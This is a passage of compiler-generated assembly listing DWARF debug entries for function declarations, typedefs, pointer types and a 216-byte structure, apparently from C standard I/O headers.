.short 318 # DW_AT_decl_line
.long 5886 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1715:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x171b:0x12 DW_TAG_subprogram
.long .Linfo_string95 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 726 # DW_AT_decl_line
.long 5886 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1727:0x5 DW_TAG_formal_parameter
.long 5933 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 39 # Abbrev [39] 0x172d:0x5 DW_TAG_pointer_type
.long 5938 # DW_AT_type
.byte 20 # Abbrev [20] 0x1732:0xb DW_TAG_typedef
.long 5949 # DW_AT_type
.long .Linfo_string137 # DW_AT_name
.byte 15 # DW_AT_decl_file
.byte 5 # DW_AT_decl_line
.byte 4 # Abbrev [4] 0x173d:0x166 DW_TAG_structure_type
.byte 5 # DW_AT_calling_convention
.long .Linfo_string136 # DW_AT_name
.byte 216 # DW_AT_byte_size
.byte 13 # DW_AT_decl_file
.byte 49 # DW_AT_decl_line
.byte 46 # Abbrev [46] 0x1746:0xc DW_TAG_member
.long .Linfo_string96 # DW_AT_name
.long 5867 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 51 # DW_AT_decl_line
.byte 0 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x1752:0xc DW_TAG_member
.long .Linfo_string97 # DW_AT_name
.long 3474 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 54 # DW_AT_decl_line
.byte 8 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x175e:0xc DW_TAG_member
.long .Linfo_string98 # DW_AT_name
.long 3474 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 55 # DW_AT_decl_line
.byte 16 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x176a:0xc DW_TAG_member
.long .Linfo_string99 # DW_AT_name
.long 3474 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 56 # DW_AT_decl_line
.byte 24 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x1776:0xc DW_TAG_member
.long .Linfo_string100 # DW_AT_name
.long 3474 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 57 # DW_AT_decl_line
.byte 32 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x1782:0xc DW_TAG_member
.long .Linfo_string101 # DW_AT_name
.long 3474 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 58 # DW_AT_decl_line
.byte 40 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x178e:0xc DW_TAG_member
.long .Linfo_string102 # DW_AT_name
.long 3474 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 59 # DW_AT_decl_line
.byte 48 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x179a:0xc DW_TAG_member
.long .Linfo_string103 # DW_AT_name
.long 3474 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 60 # DW_AT_decl_line
.byte 56 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x17a6:0xc DW_TAG_member
.long .Linfo_string104 # DW_AT_name
.long 3474 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 61 # DW_AT_decl_line
.byte 64 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x17b2:0xc DW_TAG_member
.long .Linfo_string105 # DW_AT_name
.long 3474 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 64 # DW_AT_decl_line
.byte 72 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x17be:0xc DW_TAG_member
.long .Linfo_string106 # DW_AT_name
.long 3474 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 65 # DW_AT_decl_line
.byte 80 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x17ca:0xc DW_TAG_member
.long .Linfo_string107 # DW_AT_name
.long 3474 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 66 # DW_AT_decl_line
.byte 88 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x17d6:0xc DW_TAG_member
.long .Linfo_string108 # DW_AT_name
.long 6307 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 68 # DW_AT_decl_line
.byte 96 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x17e2:0xc DW_TAG_member
.long .Linfo_string110 # DW_AT_name
.long 6317 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 70 # DW_AT_decl_line
.byte 104 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x17ee:0xc DW_TAG_member
.long .Linfo_string111 # DW_AT_name
.long 5867 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 72 # DW_AT_decl_line
.byte 112 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x17fa:0xc DW_TAG_member
.long .Linfo_string112 # DW_AT_name
.long 5867 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 73 # DW_AT_decl_line
.byte 116 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x1806:0xc DW_TAG_member
.long .Linfo_string113 # DW_AT_name
.long 6322 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 74 # DW_AT_decl_line
.byte 120 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x1812:0xc DW_TAG_member
.long .Linfo_string116 # DW_AT_name
.long 6340 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 77 # DW_AT_decl_line
.byte 128 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x181e:0xc DW_TAG_member
.long .Linfo_string118 # DW_AT_name
.long 6347 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 78 # DW_AT_decl_line
.byte 130 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x182a:0xc DW_TAG_member
.long .Linfo_string120 # DW_AT_name
.long 6354 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 79 # DW_AT_decl_line
.byte 131 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x1836:0xc DW_TAG_member
.long .Linfo_string121 # DW_AT_name
.long 6366 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 81 # DW_AT_decl_line
.byte 136 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x1842:0xc DW_TAG_member
.long .Linfo_string123 # DW_AT_name
.long 6378 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 89 # DW_AT_decl_line
.byte 144 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x184e:0xc DW_TAG_member
.long .Linfo_string125 # DW_AT_name
.long 6389 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 91 # DW_AT_decl_line
.byte 152 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x185a:0xc DW_TAG_member
.long .Linfo_string127 # DW_AT_name
.long 6399 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 92 # DW_AT_decl_line
.byte 160 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x1866:0xc DW_TAG_member
.long .Linfo_string129 # DW_AT_name
.long 6317 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 93 # DW_AT_decl_line
.byte 168 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x1872:0xc DW_TAG_member
.long .Linfo_string130 # DW_AT_name
.long 6409 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 94 # DW_AT_decl_line
.byte 176 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x187e:0xc DW_TAG_member
.long .Linfo_string131 # DW_AT_name
.long 6410 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 95 # DW_AT_decl_line
.byte 184 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x188a:0xc DW_TAG_member
.long .Linfo_string134 # DW_AT_name
.long 5867 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 96 # DW_AT_decl_line
.byte 192 # DW_AT_data_member_location
.byte 46 # Abbrev [46] 0x1896:0xc DW_TAG_member
.long .Linfo_string135 # DW_AT_name
.long 6428 # DW_AT_type
.byte 13 # DW_AT_decl_file
.byte 98 # DW_AT_decl_line
.byte 196 # DW_AT_data_member_location
.byte 0 # End Of Children Mark
.byte 39 # Abbrev [39] 0x18a3:0x5 DW_TAG_pointer_type
.long 6312 # DW_AT_type
.byte 36 # Abbrev [36] 0x18a8:0x5 DW_TAG_structure_type
.long .Linfo_string109 # DW_AT_name
# DW_AT_declaration
.byte 39 # Abbrev [39] 0x18ad:0x5 DW_TAG_pointer_type
.long 5949 # DW_AT_type
.byte 20 # Abbrev [20] 0x18b2:0xb DW_TAG_typedef
.long 6333 # DW_AT_type
.long .Linfo_string115 # DW_AT_name
.byte 3 # DW_AT_decl_file
.byte 152 # DW_AT_decl_line
.byte 38 # Abbrev [38] 0x18bd:0x7 DW_TAG_base_type
.long .Linfo_string114 # DW_AT_name
.byte 5 # DW_AT_encoding
.byte 8 # DW_AT_byte_size
.byte 38 # Abbrev [38] 0x18c4:0x7 DW_TAG_base_type
.long .Linfo_string117 # DW_AT_name
.byte 7 # DW_AT_encoding
.byte 2 # DW_AT_byte_size
.byte 38 # Abbrev [38] 0x18cb:0x7 DW_TAG_base_type
.long .Linfo_string119 # DW_AT_name
.byte 6 # DW_AT_encoding
.byte 1 # DW_AT_byte_size
.byte 59 # Abbrev [59] 0x18d2:0xc DW_TAG_array_type
.long 3479 # DW_AT_type
.byte 41 # Abbrev [41] 0x18d7:0x6 DW_TAG_subrange_type
.long 3516 # DW_AT_type
.byte 1 # DW_AT_count
.byte 0 # End Of Children Mark
.byte 39 # Abbrev [39] 0x18de:0x5 DW_TAG_pointer_type
.long 6371 # DW_AT_type
.byte 61 # Abbrev [61] 0x18e3:0x7 DW_TAG_typedef
.long .Linfo_string122 # DW_AT_name
.byte 13 # DW_AT_decl_file
.byte 43 # DW_AT_decl_line
.byte 20 # Abbrev [20] 0x18ea:0xb DW_TAG_typedef
.long 6333 # DW_AT_type
.long .Linfo_string124 # DW_AT_name
.byte 3 # DW_AT_decl_file
.byte 153 # DW_AT_decl_line
.byte 39 # Abbrev [39] 0x18f5:0x5 DW_TAG_pointer_type
.long 6394 # DW_AT_type
.byte 36 # Abbrev [36] 0x18fa:0x5 DW_TAG_structure_type
.long .Linfo_string126 # DW_AT_name
# DW_AT_declaration
.byte 39 # Abbrev [39] 0x18ff:0x5 DW_TAG_pointer_type
.long 6404 # DW_AT_type
.byte 36 # Abbrev [36] 0x1904:0x5 DW_TAG_structure_type
.long .Linfo_string128 # DW_AT_name
# DW_AT_declaration
.byte 62 # Abbrev [62] 0x1909:0x1 DW_TAG_pointer_type
.byte 20 # Abbrev [20] 0x190a:0xb DW_TAG_typedef
.long 6421 # DW_AT_type
.long .Linfo_string133 # DW_AT_name
.byte 14 # DW_AT_decl_file
.byte 46 # DW_AT_decl_line
.byte 38 # Abbrev [38] 0x1915:0x7 DW_TAG_base_type
.long .Linfo_string132 # DW_AT_name
.byte 7 # DW_AT_encoding
.byte 8 # DW_AT_byte_size
.byte 59 # Abbrev [59] 0x191c:0xc DW_TAG_array_type
.long 3479 # DW_AT_type
.byte 41 # Abbrev [41] 0x1921:0x6 DW_TAG_subrange_type
.long 3516 # DW_AT_type
.byte 20 # DW_AT_count
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x1928:0x1c DW_TAG_subprogram
.long .Linfo_string138 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 755 # DW_AT_decl_line
.long 6468 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1934:0x5 DW_TAG_formal_parameter
.long 6480 # DW_AT_type
.byte 10 # Abbrev [10] 0x1939:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 10 # Abbrev [10] 0x193e:0x5 DW_TAG_formal_parameter
.long 6485 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 39 # Abbrev [39] 0x1944:0x5 DW_TAG_pointer_type
.long 6473 # DW_AT_type
.byte 38 # Abbrev [38] 0x1949:0x7 DW_TAG_base_type
.long .Linfo_string139 # DW_AT_name
.byte 5 # DW_AT_encoding
.byte 4 # DW_AT_byte_size
.byte 63 # Abbrev [63] 0x1950:0x5 DW_TAG_restrict_type
.long 6468 # DW_AT_type
.byte 63 # Abbrev [63] 0x1955:0x5 DW_TAG_restrict_type
.long 5933 # DW_AT_type
.byte 60 # Abbrev [60] 0x195a:0x17 DW_TAG_subprogram
.long .Linfo_string140 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 740 # DW_AT_decl_line
.long 5886 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1966:0x5 DW_TAG_formal_parameter
.long 6473 # DW_AT_type
.byte 10 # Abbrev [10] 0x196b:0x5 DW_TAG_formal_parameter
.long 5933 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x1971:0x17 DW_TAG_subprogram
.long .Linfo_string141 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 762 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x197d:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 10 # Abbrev [10] 0x1982:0x5 DW_TAG_formal_parameter
.long 6485 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 63 # Abbrev [63] 0x1988:0x5 DW_TAG_restrict_type
.long 6541 # DW_AT_type
.byte 39 # Abbrev [39] 0x198d:0x5 DW_TAG_pointer_type
.long 6546 # DW_AT_type
.byte 37 # Abbrev [37] 0x1992:0x5 DW_TAG_const_type
.long 6473 # DW_AT_type
.byte 60 # Abbrev [60] 0x1997:0x17 DW_TAG_subprogram
.long .Linfo_string142 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 573 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x19a3:0x5 DW_TAG_formal_parameter
.long 5933 # DW_AT_type
.byte 10 # Abbrev [10] 0x19a8:0x5 DW_TAG_formal_parameter
.long 5867 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x19ae:0x18 DW_TAG_subprogram
.long .Linfo_string143 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 580 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x19ba:0x5 DW_TAG_formal_parameter
.long 6485 # DW_AT_type
.byte 10 # Abbrev [10] 0x19bf:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 64 # Abbrev [64] 0x19c4:0x1 DW_TAG_unspecified_parameters
.byte 0 # End Of Children Mark
.byte 33 # Abbrev [33] 0x19c6:0x1c DW_TAG_subprogram
.long .Linfo_string144 # DW_AT_linkage_name
.long .Linfo_string145 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 640 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x19d6:0x5 DW_TAG_formal_parameter
.long 6485 # DW_AT_type
.byte 10 # Abbrev [10] 0x19db:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 64 # Abbrev [64] 0x19e0:0x1 DW_TAG_unspecified_parameters
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x19e2:0x12 DW_TAG_subprogram
.long .Linfo_string146 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 727 # DW_AT_decl_line
.long 5886 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x19ee:0x5 DW_TAG_formal_parameter
.long 5933 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 65 # Abbrev [65] 0x19f4:0xc DW_TAG_subprogram
.long .Linfo_string147 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 733 # DW_AT_decl_line
.long 5886 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 60 # Abbrev [60] 0x1a00:0x1c DW_TAG_subprogram
.long .Linfo_string148 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 329 # DW_AT_decl_line
.long 6410 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1a0c:0x5 DW_TAG_formal_parameter
.long 6684 # DW_AT_type
.byte 10 # Abbrev [10] 0x1a11:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 10 # Abbrev [10] 0x1a16:0x5 DW_TAG_formal_parameter
.long 6699 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 63 # Abbrev [63] 0x1a1c:0x5 DW_TAG_restrict_type
.long 6689 # DW_AT_type
.byte 39 # Abbrev [39] 0x1a21:0x5 DW_TAG_pointer_type
.long 6694 # DW_AT_type
.byte 37 # Abbrev [37] 0x1a26:0x5 DW_TAG_const_type
.long 3479 # DW_AT_type
.byte 63 # Abbrev [63] 0x1a2b:0x5 DW_TAG_restrict_type
.long 6704 # DW_AT_type
.byte 39 # Abbrev [39] 0x1a30:0x5 DW_TAG_pointer_type
.long 5785 # DW_AT_type
.byte 60 # Abbrev [60] 0x1a35:0x21 DW_TAG_subprogram
.long .Linfo_string149 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 296 # DW_AT_decl_line
.long 6410 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1a41:0x5 DW_TAG_formal_parameter
.long 6480 # DW_AT_type
.byte 10 # Abbrev [10] 0x1a46:0x5 DW_TAG_formal_parameter
.long 6684 # DW_AT_type
.byte 10 # Abbrev [10] 0x1a4b:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 10 # Abbrev [10] 0x1a50:0x5 DW_TAG_formal_parameter
.long 6699 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x1a56:0x12 DW_TAG_subprogram
.long .Linfo_string150 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 292 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1a62:0x5 DW_TAG_formal_parameter
.long 6760 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 39 # Abbrev [39] 0x1a68:0x5 DW_TAG_pointer_type
.long 6765 # DW_AT_type
.byte 37 # Abbrev [37] 0x1a6d:0x5 DW_TAG_const_type
.long 5785 # DW_AT_type
.byte 60 # Abbrev [60] 0x1a72:0x21 DW_TAG_subprogram
.long .Linfo_string151 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 337 # DW_AT_decl_line
.long 6410 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1a7e:0x5 DW_TAG_formal_parameter
.long 6480 # DW_AT_type
.byte 10 # Abbrev [10] 0x1a83:0x5 DW_TAG_formal_parameter
.long 6803 # DW_AT_type
.byte 10 # Abbrev [10] 0x1a88:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 10 # Abbrev [10] 0x1a8d:0x5 DW_TAG_formal_parameter
.long 6699 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 63 # Abbrev [63] 0x1a93:0x5 DW_TAG_restrict_type
.long 6808 # DW_AT_type
.byte 39 # Abbrev [39] 0x1a98:0x5 DW_TAG_pointer_type
.long 6689 # DW_AT_type
.byte 60 # Abbrev [60] 0x1a9d:0x17 DW_TAG_subprogram
.long .Linfo_string152 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 741 # DW_AT_decl_line
.long 5886 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1aa9:0x5 DW_TAG_formal_parameter
.long 6473 # DW_AT_type
.byte 10 # Abbrev [10] 0x1aae:0x5 DW_TAG_formal_parameter
.long 5933 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x1ab4:0x12 DW_TAG_subprogram
.long .Linfo_string153 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 747 # DW_AT_decl_line
.long 5886 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1ac0:0x5 DW_TAG_formal_parameter
.long 6473 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x1ac6:0x1d DW_TAG_subprogram
.long .Linfo_string154 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 590 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1ad2:0x5 DW_TAG_formal_parameter
.long 6480 # DW_AT_type
.byte 10 # Abbrev [10] 0x1ad7:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 10 # Abbrev [10] 0x1adc:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 64 # Abbrev [64] 0x1ae1:0x1 DW_TAG_unspecified_parameters
.byte 0 # End Of Children Mark
.byte 33 # Abbrev [33] 0x1ae3:0x1c DW_TAG_subprogram
.long .Linfo_string155 # DW_AT_linkage_name
.long .Linfo_string156 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 647 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1af3:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 10 # Abbrev [10] 0x1af8:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 64 # Abbrev [64] 0x1afd:0x1 DW_TAG_unspecified_parameters
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x1aff:0x17 DW_TAG_subprogram
.long .Linfo_string157 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 770 # DW_AT_decl_line
.long 5886 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1b0b:0x5 DW_TAG_formal_parameter
.long 5886 # DW_AT_type
.byte 10 # Abbrev [10] 0x1b10:0x5 DW_TAG_formal_parameter
.long 5933 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x1b16:0x1c DW_TAG_subprogram
.long .Linfo_string158 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 598 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1b22:0x5 DW_TAG_formal_parameter
.long 6485 # DW_AT_type
.byte 10 # Abbrev [10] 0x1b27:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 10 # Abbrev [10] 0x1b2c:0x5 DW_TAG_formal_parameter
.long 6962 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 39 # Abbrev [39] 0x1b32:0x5 DW_TAG_pointer_type
.long 6967 # DW_AT_type
.byte 66 # Abbrev [66] 0x1b37:0x30 DW_TAG_structure_type
.byte 5 # DW_AT_calling_convention
.long .Linfo_string163 # DW_AT_name
.byte 24 # DW_AT_byte_size
.byte 67 # Abbrev [67] 0x1b3e:0xa DW_TAG_member
.long .Linfo_string159 # DW_AT_name
.long 3467 # DW_AT_type
.byte 0 # DW_AT_data_member_location
.byte 67 # Abbrev [67] 0x1b48:0xa DW_TAG_member
.long .Linfo_string160 # DW_AT_name
.long 3467 # DW_AT_type
.byte 4 # DW_AT_data_member_location
.byte 67 # Abbrev [67] 0x1b52:0xa DW_TAG_member
.long .Linfo_string161 # DW_AT_name
.long 6409 # DW_AT_type
.byte 8 # DW_AT_data_member_location
.byte 67 # Abbrev [67] 0x1b5c:0xa DW_TAG_member
.long .Linfo_string162 # DW_AT_name
.long 6409 # DW_AT_type
.byte 16 # DW_AT_data_member_location
.byte 0 # End Of Children Mark
.byte 33 # Abbrev [33] 0x1b67:0x20 DW_TAG_subprogram
.long .Linfo_string164 # DW_AT_linkage_name
.long .Linfo_string165 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 693 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1b77:0x5 DW_TAG_formal_parameter
.long 6485 # DW_AT_type
.byte 10 # Abbrev [10] 0x1b7c:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 10 # Abbrev [10] 0x1b81:0x5 DW_TAG_formal_parameter
.long 6962 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x1b87:0x21 DW_TAG_subprogram
.long .Linfo_string166 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 611 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1b93:0x5 DW_TAG_formal_parameter
.long 6480 # DW_AT_type
.byte 10 # Abbrev [10] 0x1b98:0x5 DW_TAG_formal_parameter
.long 6410 # DW_AT_type
.byte 10 # Abbrev [10] 0x1b9d:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 10 # Abbrev [10] 0x1ba2:0x5 DW_TAG_formal_parameter
.long 6962 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 33 # Abbrev [33] 0x1ba8:0x20 DW_TAG_subprogram
.long .Linfo_string167 # DW_AT_linkage_name
.long .Linfo_string168 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 700 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1bb8:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 10 # Abbrev [10] 0x1bbd:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 10 # Abbrev [10] 0x1bc2:0x5 DW_TAG_formal_parameter
.long 6962 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x1bc8:0x17 DW_TAG_subprogram
.long .Linfo_string169 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 606 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1bd4:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 10 # Abbrev [10] 0x1bd9:0x5 DW_TAG_formal_parameter
.long 6962 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 33 # Abbrev [33] 0x1bdf:0x1b DW_TAG_subprogram
.long .Linfo_string170 # DW_AT_linkage_name
.long .Linfo_string171 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 697 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1bef:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 10 # Abbrev [10] 0x1bf4:0x5 DW_TAG_formal_parameter
.long 6962 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 60 # Abbrev [60] 0x1bfa:0x1c DW_TAG_subprogram
.long .Linfo_string172 # DW_AT_name
.byte 12 # DW_AT_decl_file
.short 301 # DW_AT_decl_line
.long 6410 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1c06:0x5 DW_TAG_formal_parameter
.long 7190 # DW_AT_type
.byte 10 # Abbrev [10] 0x1c0b:0x5 DW_TAG_formal_parameter
.long 6473 # DW_AT_type
.byte 10 # Abbrev [10] 0x1c10:0x5 DW_TAG_formal_parameter
.long 6699 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 63 # Abbrev [63] 0x1c16:0x5 DW_TAG_restrict_type
.long 3474 # DW_AT_type
.byte 68 # Abbrev [68] 0x1c1b:0x16 DW_TAG_subprogram
.long .Linfo_string173 # DW_AT_name
.byte 12 # DW_AT_decl_file
.byte 97 # DW_AT_decl_line
.long 6468 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1c26:0x5 DW_TAG_formal_parameter
.long 6480 # DW_AT_type
.byte 10 # Abbrev [10] 0x1c2b:0x5 DW_TAG_formal_parameter
.long 6536 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x1c31:0x16 DW_TAG_subprogram
.long .Linfo_string174 # DW_AT_name
.byte 12 # DW_AT_decl_file
.byte 106 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1c3c:0x5 DW_TAG_formal_parameter
.long 6541 # DW_AT_type
.byte 10 # Abbrev [10] 0x1c41:0x5 DW_TAG_formal_parameter
.long 6541 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x1c47:0x16 DW_TAG_subprogram
.long .Linfo_string175 # DW_AT_name
.byte 12 # DW_AT_decl_file
.byte 131 # DW_AT_decl_line
.long 5867 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1c52:0x5 DW_TAG_formal_parameter
.long 6541 # DW_AT_type
.byte 10 # Abbrev [10] 0x1c57:0x5 DW_TAG_formal_parameter
.long 6541 # DW_AT_type
.byte 0 # End Of Children Mark
.byte 68 # Abbrev [68] 0x1c5d:0x16 DW_TAG_subprogram
.long .Linfo_string176 # DW_AT_name
.byte 12 # DW_AT_decl_file
.byte 87 # DW_AT_decl_line
.long 6468 # DW_AT_type
# DW_AT_declaration
# DW_AT_external
.byte 10 # Abbrev [10] 0x1c68:0x5 DW_TAG_formal_parameter
